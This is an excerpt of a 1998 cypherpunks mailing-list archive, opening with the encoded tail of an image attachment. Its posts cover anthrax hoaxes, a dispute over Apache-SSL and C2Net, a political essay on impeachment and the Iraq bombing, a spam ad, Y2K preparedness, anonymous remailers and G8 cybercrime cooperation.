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
AAm5AwU4AxgjByc5ya1wMk/5zS9e9IRz/wDwhmhm6e4Nq4LXq6kR9okC/aR/
y027sZ/DBqS/8H6Lf3eoXE8E2/U4liu/LuZY1nVQANwVgOAMfQkdzW6E6YNO
IwD/ADoGcf42sotK8FPFZXt9p9vYwLFAttLtPZEDMfmwMjuDjJ64rw/Wms7W
S5cyi4e5USCeYFnbgd25znnOT0HPavonxXpj6t4evrCEjzZY8JkZBI5AP1xj
8a+Z9Zt7izuZYbktFLETGyuhG057+/8AhXn4rm5l2PeymlSleb+JGn4OV5Q0
izRwrK7IWkTIJ2qQOD79SMfXFdTaXKzW8cltLbO6qUIWXJjA56jPP3vmGMnA
5rz/AMK20194jgaB0K2bC5lJXhFQjkn64Htmu7j1LzmK290ZxGwuOHP3CeTt
BGQC3QY6DIB6+bVi4vTc6q/vTZajW0RFEsiRlSykrMqhucjA3AdG6+vbFO3W
H/P1/wCTKf8AxyoBrElvM0F5OJ2ySfLP3CMfLtEZI65OeRkA89X/ANt2/wDd
m/75f/4zWV5Ldfn/AJkRUrafme8ZpGUN2z+FKDkUtfUnzRVeI5JXjio1OD1z
zng4q2y569KY0WegHWkIaDkdcmqur6ZZazp89hqdrHdWs64kjccEevqCOoI5
BGeKs+WVqVEIXnFAHzh8RPgzqmjSS3/hsPqVgWBFugLXEQJPG0ffUccjnnpg
E1jeDPiz4g8M7Le8Y6rYINognfDr6bZMEjHHByMdAK+qHXcMVyHjD4deHfFm
6XVbLbdFSBdW7FJR05JHDYwMbgQPxpFJ9zgdM8Y+EfE2sTX0uonSruTEsUep
IFSKYCEmQODhlBt4sKSpPz8ncAuTrmoQeItfsdOGo+VpttttYrmfuBgNK3bL
EZ7DpnHNO174A6hBdeZ4c1aCWAEsEvQVdcdBlVIb8lrC/wCEK8eaZFJJd6E1
0oPBjniLfgqkk/lmuTFQqTilDbqe1lOIw1Co51W07WTte39eh9D6RpVpo9lH
aafCsUCDoByT6k9zWV470LUPEWmW+nWNxFbwtOr3DuxzsHYKB83JzjI5UfUf
PTp45ac/Y9F16zkK+XutredGZeykgcjge3FX9J+GfjHWp2ub7T76STqWu22M
fxkINbKPPDlkreRwSqexr+0pS5mtbtde51Os+EvDuixyG78Z2juhKtDBAJJd
w7bFckdMc4ArIf4lNoGjNpnhCzlgdmDy6jeFWkc45Ii5VewHLcdsnNbul/B7
XJY0+1NaWKltrCSQu4X1AUFT9Miuu0f4SeGNNdJr+OTVLhdpzOdsYYHOQg7H
0YsKVOhTpu8UXiMxxOJjyVZ3Xol+R4foXhjxP4/1Q3MQnuGkyZb+7LeUCoHB
fByegCjJ9sAmvffAPgHS/BVsWhxdahIMSXbphiM52qMnaPx5wM5wMdWhjRFV
FCIoAVR2HYYrhfEWo3oudZtgbpoTqdksP2e58uR1byBJEh3KVHI5yBmQ89TW
xwHoCMKkz6Y/GuO1QxeFtDuNZiGoK6G3MsVzey3BSNpE3jDOy7gC3I/PFQeH
tOurXxHYi+1K8uZPsshUG7k2Exx20ZLJu2k7jK3IOS+eoGADt9o5Gff2pjAg
9OlcTpGs/wBt6Rrl7JqXn2h1MCD7HO6M8Zhi8qJG3KUcuy5GQNxcHgmmPcXl
pbalZ3rXMd5LfwF3+1O4a1nvWjQJz+6PlhhhMEDac54VhY7depJ9alA46Ejt
2rjfCzedq7ulzcMbSO4hljkuZnBUXDRQMFZipO2CTccbiSCepq9cR3MemWqX
OpTy3m6HyijbN83l7cFUwWTIMjKc8Bs/KMAEdJgA8cfhS4x0PGK898N6zrV9
o9xDbXcbz+SkjSTAl4nls0lVlPTAl3naQQAwAwFCn0EElTx70gehzuveMNJ0
eR4ZpmmnVSTHCMkdepJAHTHWvK/HHiaz115A9rbxeUocZi3OzDGAznkjqAAP
5V6D408PzTyy3UBUJIAHYf6xP909AOpJPrXmc2l6jMoS1TypSAAHQrtGcdwd
vB+8eueM15tX205cjWn9dSlKUHeLMewkM91PFZtFGXhbcIYVG0ngbgO3OcAE
8dK1ZotURgkk0EtvOmGAlPXsSQDkHd0GDj24Frw74b1Wyut195XEmTsTAQY7
5GQTk4zz069r87yWqsbseVFHIx2JE5Y5IxvIxk5boecAn3rlnTqKTXL/AF9x
6NPl5YtS1MC11xrSPNzhCAEYR5d9wGDubBHQDjnjA7VL/wAJVB/fn/74/wDs
K34I4LlZAvlxEPvHlwlvlYZAJ65HTkAnGcCn/YY/+fg/+A5/wqE2tEn+P+RT
nUT6fgexJMqqAx5x6U5Z9xPYVVb7y/57U6P+L6/0FfQHlF7PrS0h7UDpTGLU
cjFelSVDP2+tAMha6YdF6dc1Ab6TcdqA9utLJ1aqy/fP1/pSEOn1P93gjDk4
UAdaILW6mId12qeQc9vzrNuP9bF/v/0NdNaf8esf+6KBlePy7RQPLO8jnOM1
BPqcq52xDH1qa9/1v4Cs646H6UATR6jJMGXbgj3pywXMvzDH51Qs/wDWN+Fb
1p/qqAKYsJwTyB361l6h4QtL9nkuo28xn8zzI5WR1bMZyGBBHMUfT+7XUU1/
umgLGO+mxyaebCbMsTRiJxKxcuuMfMTkn3J5ptt4YsoXjkTzI3jeV1KSMpzJ
Ksr9D0LqMjpjI6HFaDf6/wDz61cHSgEYd94U0+9leV5b2GSSXz3a3upIdz7F
TPykfwoB+fqaa3hSwEN3HH5mbs7ncvlkO4upUnkbXZnX0J47Y3qKLDOcsNCg
0i5MySXRJTYQ9y7o3TLFCcbjjJbGSSSeSaQaFby6XY2d1c3UjWaptmineF2Z
UKZLKQeQTke9bGo/d/CoY+o+hpEmBceDoJgkenTyWcWJQxViD80JiTAGB8ik
Bc9AvQk7h1W0BcZPvzTLTpT26fnTGRtgYXnNLDZxgZKgE88Cmv8A60fSrafc
X6UAhPKj/uL+VJ5UZ6xp/wB8in0gpjKs2mWU4HmW0TDORmNT/MVF/Yenf8+k
H/flP8Kvr90fSlpWA//Z
--Boundary..3999.1071713823.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 29 Dec 1998 03:12:53 +0800
To: cypherpunks@cyberpass.net
Subject: Anthrax Theatre II
Message-ID: <199812281843.MAA27470@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Performances of the award-winning "Anthrax Theatre" continue across
the nation.  Innovative variations on the original script are being
demonstrated to test audiences, including stripping 200 Mervyn's
shoppers naked, and forcing them to rinse themselves with laundry
bleach.
 
-----
 
POMONA, Calif. (AP) -- Hundreds of people were quarantined for hours
inside a nightclub after a phony anthrax threat, at least the seventh
such hoax in Southern California this month.
 
No trace of the potentially deadly bacterium was found in preliminary
tests, authorities said Sunday.
 
A Los Angeles County hazardous materials team and the FBI's Domestic
Terrorism Task Force were called to the Glass House club at 11:50 p.m.
Saturday after a man called the Police Department and said ``a
significant quantity'' of anthrax would be released into the air,
police Lt. Gary Graham said.
 
If inhaled and then left untreated, anthrax spores can cause
respiratory failure and death within a week.
 
About 800 people were kept inside the club for about four hours while
the air-conditioning system was checked and samples taken for further
study, Graham said.
 
Clubgoers then were taken outside and given information on anthrax
symptoms. They were then allowed to return to the club if they wished.
 
Authorities had not immediately determined whether the threat was
related to six others since the middle of the month. In each case, no
evidence of anthrax was found:
 
--On Dec. 14, a secretary at the Perris School District in Riverside
County opened a letter that said, ``you've been exposed to anthrax.''
About 20 people were isolated and decontaminated.
 
--On Dec. 17, an office building in the Westwood area of Los Angeles
received a letter threatening exposure to anthrax. Nearly two dozen
workers had to strip and go through a decontamination process.
 
--On Dec. 18, a U.S. Bankruptcy Court in the Woodland Hills area was
targeted and about 90 people underwent antibiotic treatment.
 
--On Dec. 21, a telephoned threat emptied two Van Nuys courthouses and
forced about 1,500 people into quarantine for several hours.
 
--On Wednesday, the Chatsworth office of Time Warner Cable was
evacuated after a threat. About 200 people had to leave their work
stations.
 
--On Thursday, Christmas Eve, a Mervyn's store in Palm Desert was the
target of a hoax, and 200 people had to disrobe and were rinsed with a
bleach solution.
 
Anthrax hoaxes also have happened in Colorado, Kentucky, and
Tennessee.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Sutton <paul@c2.net>
Date: Tue, 29 Dec 1998 04:45:52 +0800
To: jim finder <jim_finder@hotmail.com>
Subject: Re: [ssl-users] Re: Sammers    eers Theft  of Ben lauriesIntellectual
In-Reply-To: <19981225051204.19697.qmail@hotmail.com>
Message-ID: <Pine.LNX.4.00.9812281240330.5978-100000@ecstasy.localnet>
MIME-Version: 1.0
Content-Type: text/plain



A highly amusing ranting. I'm glad the poster chose to remain anonymous:
they would surely be ashamed to attach their name to such a poorly written
and grossly inaccurate message.

Anonymous writes:
>C2 gots its start by purloining without compensation
>Ben Lauries Apache-SSL patches.... Sameer used these and then

I think one of the greatest acheivements of open source projects in the
last few years has been the acceptance of licensed in the BSD style. These
allow for commercial use of the open source projects with minimal
advertising clauses. This has lead to the acceptance of open source
software as a valid model to create software that both benefits the
community through free availability _and_ generals commercial spinoffs
which themselves lead to a greater acceptance of the underlying free code.

If a particular contributor to a BSD style project has a problem with this
then they are free (in all senses) to start a project using a more
restrictive license, such as the GPL.

>From this comment (and others) it looks like the poster has a
philosophical objection to commercial software. That is fine, and I'm sure
that the poster will have a lot of fun attacking other software vendors.

>had the fucking gall to remove source from apache-ssl

At the time, Verisign would not issue certificates for code available in
source form (this is also why certificates from Verisign were not
available for Apache-SSL). They now issue certificates for programs which
are available in source form (subject to some restrictions, of course).

>for the mod_ssl.c... all was rosy until Ralf releases
>a mod_ssl.c of his design... result??
>C2's business worlwide took a nose dive...(layoffs etc)

I'm not sure that you understand the relationship between the development
of Stronghold, the availablility of mod_ssl, and the employee losses in
the Oakland (US) office. You should also remember that Stronghold is
developed entirely outside the US in the UK office which has been
consistently increasing it size over the same period: it is quite
appropriate for an international cryptography company to arrange its
staffing such that it is not affected by the US export restrictions.

mod_ssl really hasn't been around long enough to have a serious affect on
Stronghold sales. It is also very simplistic to assume that the
availability of the free Apache SSL implementation would cause the
majority of Stronghold customers to switch over: if that were the case,
surely they would now be using Apache-SSL and would not have waited until
mod_ssl was available? There is plenty of room for both free and
commercial SSL servers.

>so now Sameer is trying to coopt Ralf's mod_ssl.c project
>(mark my words if Sameer gets his way the source for future
>verions will NOT be available no matter what he says now...)

This does not make sense. mod_ssl is an independent project: whether or
not Stronghold includes mod_ssl as source or binary would have no effect
on the continuation of the mod_ssl project (in the same way that it makes
no difference to Apache if Stronghold comes with Apache source, or to php
if it comes with PHP source).  things, so it

>I seen it happen once so now when the litte sob trys it
>again I am blowing the whistle...(and retelling history openly)

If you had any validity I don't think you would post anonymously, and you
would explain why your arguments should make sense, since to me they are
highly simplistic and rather lacking in truth.

Paul
--
Paul Sutton, C2Net Europe                    http://www.eu.c2.net/~paul/
Editor, Apache Week .. the latest Apache news http://www.apacheweek.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 29 Dec 1998 03:28:00 +0800
To: cypherpunks@cyberpass.net
Subject: People With Honor
Message-ID: <v04020a8cb2ad7e43aeff@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Mon, 28 Dec 1998 17:55:59 GMT
To: "DaveNet World" <davenet-world@scripting.com>
From: dave@scripting.com (DaveNet email)
Subject: People With Honor
Sender: <davenet-world@scripting.com>

-------------------------------------
>From Scripting News... It's DaveNet!
Released on 12/28/98; 9:55:55 AM PST
-------------------------------------

  Seasons Greetings DaveNet readers!

  I've been keeping up on the issues of impeachment, reading
  newspapers and websites, and considering ideas that have not been
  showing up in these places. I've also been talking with people and
  listening, and I think people in the US are overlooking something
  that we may not be able to ignore much longer.

  First, there is definitely a serious split in this country. Some
  people blame the Republicans for what happened, I've even heard
  people say they're so angry with the Republicans that they'll never
  vote Republican again. To them, I want to say, save some of your rage
  for Clinton. Understand that there are two sides here.

  Clinton screwed up, the Republicans responded, and Clinton did
  more, and on and on. How far has it gone? That's what I want to think
  about now, logically, precisely, and not emotionally or
  expressively. And I want to consider other points of view,
  especially those from outside the US.

  If we're ever going to work together again, there will have to be give
  on both sides, sooner or later. We'll have to see ourselves as one
  country, responsible for what we do, no matter what party you belong
  to or support.

  ***A tough question

  I was going to bag this piece, it's not worth the trouble, I said to
  myself, until I saw CBS's 60 Minutes last night, and listened to Andy
  Rooney talk about how far it's gone. He asked the same question I'm
  going to ask here.

  ***What happened in Iraq?

  The question: Was the US bombing of Iraq an attempt by Clinton to stay
  in power? This question has to be asked, although I do it with
  trepidation, imagining that some of my fellow Americans will accuse
  me of treason, or not pulling behind our leader in a time of crisis.

  But as I sort thru this, I want to know, where is the crisis? Does Iraq
  threaten us? If so, how? Oil prices are now lower than they have ever
  been, as if oil prices were an honorable reason to bomb another
  country. How would we feel if Iraq had bombed US cities? How would we
  feel if Iraq found a way to retaliate now that we have bombed their
  cities? Could we blame them if they did?

  Did Israel ask us to bomb Iraq? Clearly if Iraq attacks Israel, that's
  a problem for Israel, and we're an ally and protector of Israel. Did
  Saudi Arabia, Kuwait, Jordan or Egypt ask us? How come they're
  staying silent on this? Or are they not silent and we're not hearing
  about it?

  If timing was a big issue, as Clinton says it was, why choose to bomb
  Iraq just as the House was convening to decide impeachment? Are we to
  believe that the decision was made without considering
  impeachment?

  At some point in the deliberation, someone must have said "But Mr.
  President, couldn't this backfire on us? Couldn't it look as if we're
  doing this to bolster your Presidency?" It's the first question that
  pops into a thinking mind.

  The question has barely been raised on TV or in the newspapers or on the
  web. Why? This is supposed to be an open country. I can't believe that
  anyone who's really thinking about this hasn't asked themselves
  this question. It's on my mind, I can tell you that for sure.

  ***Carole King?

  These are very strange times.

  This came home in a new way when I saw a TV clip of Carole King
  entertaining the troops on a US warship. What was she doing there? Did
  I miss something? Is this the Bizarro World? Next is it going to be Bob
  Dylan, Jesse Jackson, Tom Hanks, Robin Williams and Whoopi
  Goldberg?

  What am I missing? What are we supporting? If you had a debate with a
  thoughtful person from outside the US, what would you say about how
  our military is being used? Justly, fairly, wisely, respectfully,
  honorably? And is it really still just about sex? Can Clinton blame
  the Republicans for this? Where will the buck stop this time?

  The appearance of dishonorable militarism is enough to cause some
  people to draw their own conclusions. If it walks like a duck, quacks
  like a duck..

  ***Did you know?

  I'm reminded of those who said they knew that Clinton was lying when he
  said he never had sexual relations with that woman. I wonder if
  they're listening carefully to his words now. Are they really this
  gullible? How will you feel if it escalates, and you or your children
  are asked to fight a war in Iraq? What will you be fighting for?

  This is very bad for the US. We are being irresponsible. We let a
  dishonored president bomb foreign countries and we look the other
  way. I keep watching the Op-Ed pages for a clue to this, but they are
  silent. I wonder why?

  ***A failure to communicate

  Over the weekend I watched a great movie, Cool Hand Luke, starring
  Paul Newman. He's a tragic Christ-like figure, making it an
  appropriate movie to watch during the big Christian holiday.

  He says and does things the other inmates wish they had the courage to
  say and do. The warden breaks his spirit, but it returns before the
  movie ends. Cornered, resigned to dying, he repeats, with a twinkle
  in his eye, what the warden said in an earlier scene. "What we have here
  is a failure to communicate." Then the jailkeeper shoots him. As they
  carry away his dying body I wonder whether it was worth it.

  In the end the prisoners are still in prison, but they have the memory
  of his courage to warm them. Luke is gone, the truth is gone, but at
  least they had a glimpse of what it's like to be alive.

  ***People with honor

  Compared with perjury and obstruction of justice, it matters more to
  me that the President looked into the camera, with induced outrage,
  and denied doing something that he later admitted doing. It was his
  outrage that did it for me. He's an emotional manipulator on a mass
  scale. Looking at the film of the Cabinet officers saying they
  believed him, I wondered "How could they?"

  If this country ever had courage, now is the time for it to surface.
  Don't wait for a hero, no one person can do it. We all have to decide if
  honor counts. Or at least a good portion of the electorate has to get
  there.

  The Democrats point to Clinton's historic 70 percent approval
  rating, and they're right to do so. We preach the value of democracy,
  but are we hypocrites, do we get any benefit from democracy in our own
  country? The man lies. Even his supporters acknowledge that. We
  accept that, but what's the limit? How far will we go? Consider that
  seriously, as you try to understand the news, as you try to understand
  the country you live in and how it relates to other countries.

  If Clinton stays, do we have a system based on lies? None of us know how
  deep it goes. We may be fighting a war as a by-product of this, a real
  war, with battleships and bombs. Don't blame anyone but yourself.
  You could have stopped it and you still can, it's not too late, yet.

  Dave Winer

-------------------------------------------
Scripting News: <http://www.scripting.com/>

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VR6R@aol.com
Date: Tue, 29 Dec 1998 06:32:35 +0800
Subject: Click-N-Go! USA WHOLESALE DIRECTORY DISK
Message-ID: <63f54761.3687d3d2@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Looking to market a product on the net?
Tired of working for others and dealing with huge amounts of paper work?

<A HREF="http://members.aol.com/giget7485/">Click-N-Go! USA WHOLESALE
DIRECTORY DISK</A>

You already know people are making small fortunes selling products online.
They buy low and sell for 3 to 4 times what they paid for the products! What
are you waiting for?
We show you how to sell your products!
We show you where to get the hottest deals on wholesale products!

Get More Information on how to become part of the winning edge of marketing
your own products online.  No signup fee's because its YOUR business.  Little
to no inventory investment or advertising investment, be your own boss with no
crap.
<A HREF="http://members.aol.com/giget7485/">Click here for more information
</A>

I'm making money and you can too!  We can do it together!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Tue, 29 Dec 1998 03:28:08 +0800
To: cypherpunks@cyberpass.net
Subject: Utne: Y2K Citizen's Action Guide
Message-ID: <3687D6BE.3D07B6BE@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain




http://www.utne.com/y2k/

This month's Utne Reader came with an attached 4.25"x8.5" booklet.  An e-copy
of the said booklet is available from their site.

Its contents, much like the magazine, contains articles snipped and or
adapted from elsewhere.  Unfortunately the thread throughout the whole thing
is "those who go in the woods with automatic rifles are the bad selfish
guys."

IMHO, helping your family and 'hood is a great thing.  Being labeled a kook
if you are selfish and have no instinct other than self preservation isn't
such a great thing.

This sort of thought will only lead to a further erosion of freedom and a
fall towards communism as more and more people will feel pressured into
"sharing" their property and resources with the commune rather than
hoarding.  By all means, make everyone aware of the problems and help them
cope if that's what you want to do, just don't force others to do the same at
gunpoint.  :)

It does have some redeeming qualities though if you ignore the political
sharing slant.  The articles they've included (save for the "Public Citizen"
section) are good planning guides.


-- 
----------------------------  Kaos Keraunos Kybernetos  -------------------
 + ^ +        Sunder          "The   real aim  of current policy is to /|\
  \|/    sunder@sunder.net    ensure the continued effectiveness of   /\|/\
<--*--> ALLOW FREE EXPORT OF  US information warfare assets against   \/|\/
  /|\   STRONG CRYPTOGRAPHY!  individuals,businesses and governments   \|/
 + v +  PROTEST WASSENAAR!!!  in Europe and elsewhere"  -- Ross Anderson
------------------------------ http://www.sunder.net ----------------------

RESTRICTED DATA - This material contains RESTRICTED DATA as defined in
the Atomic Energy Act of 1954. Unauthorized disclosure subject to 
administrative and criminal sanctions.  NOFORN ORCON WNINTEL SIOP-ESI CNWDI




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 29 Dec 1998 00:48:53 +0800
To: cypherpunks@toad.com
Subject: Mail2news@anon.lcs.mit.edu Not Propagating to Compuserve/Sprynet
Message-ID: <199812281554.QAA18888@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On 28 Dec 1998, Anonymous wrote:

>Has anyone else experienced posts sent via the anon.lcs.mit.edu
>mail2news gateway not propagating to Compuserve/Sprynet's news
>servers?  I've made a couple of posts, both anonymously and
>non-anonymously via that gateway, and they haven't been showing up
>at CIS/Sprynet.  Yet they've been archived on Dejanews and replies
>to them from users on other servers have shown up.
>
>Is this a propagation problem, or are Compuserve and Sprynet
>blocking posts from that gateway?

Hey! Stop abusing the anonymous remailers! Your identity isn't findable! It
defeats the whole purpose of Anon!

Fleaza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 29 Dec 1998 10:53:55 +0800
To: cypherpunks@cyberpass.net
Subject: Kha0s Linux Distribution
Message-ID: <199812290233.UAA28178@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



>From the webpage at Kha0s.org:
 
> Expect the first beta release of kha0S to include Matt
> Blaze's CFS. It has been around for a while and has had
> the benefit of review by the cryptographic community.
 
A good start, I guess.  

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 29 Dec 1998 11:08:46 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: G8 MIB
Message-ID: <199812290247.VAA07707@smtp0.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



>From a DoJ press release 15 December 1998:

High-tech crime

  The G8 countries have established a 24 hour network of 
law enforcement experts capable of responding swiftly to 
requests for help with investigations that cross international 
borders, including hacking cases. The network, which is 
now in use, is open to wider membership and a number of 
non G8 countries have already joined. The Lyon Group is 
pursuing consultations with industry, including internet 
service providers, on preventing criminal use of networks 
and ensuring traceability of their communications. It is also 
developing proposals for a legal framework for retrieving 
electronic evidence swiftly in cases that cut across 
international borders.

More:


http://www.usdoj.gov/opa/pr/1998/December/588ag.htm








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Tue, 29 Dec 1998 11:17:10 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: Re: G8 MIB
Message-ID: <199812290207.VAA002.99@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <199812290247.VAA07707@smtp0.mindspring.com>, on 12/28/98 
   at 09:48 PM, John Young <jya@pipeline.com> said:


>High-tech crime

>  The G8 countries have established a 24 hour network of 
>law enforcement experts capable of responding swiftly to 
>requests for help with investigations that cross international  borders,
>including hacking cases. The network, which is 
>now in use, is open to wider membership and a number of 
>non G8 countries have already joined. The Lyon Group is 
>pursuing consultations with industry, including internet 
>service providers, on preventing criminal use of networks 
>and ensuring traceability of their communications. It is also  developing
>proposals for a legal framework for retrieving 
>electronic evidence swiftly in cases that cut across 
>international borders.

>More:


>http://www.usdoj.gov/opa/pr/1998/December/588ag.htm


Encrypt everything, trust no one.

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

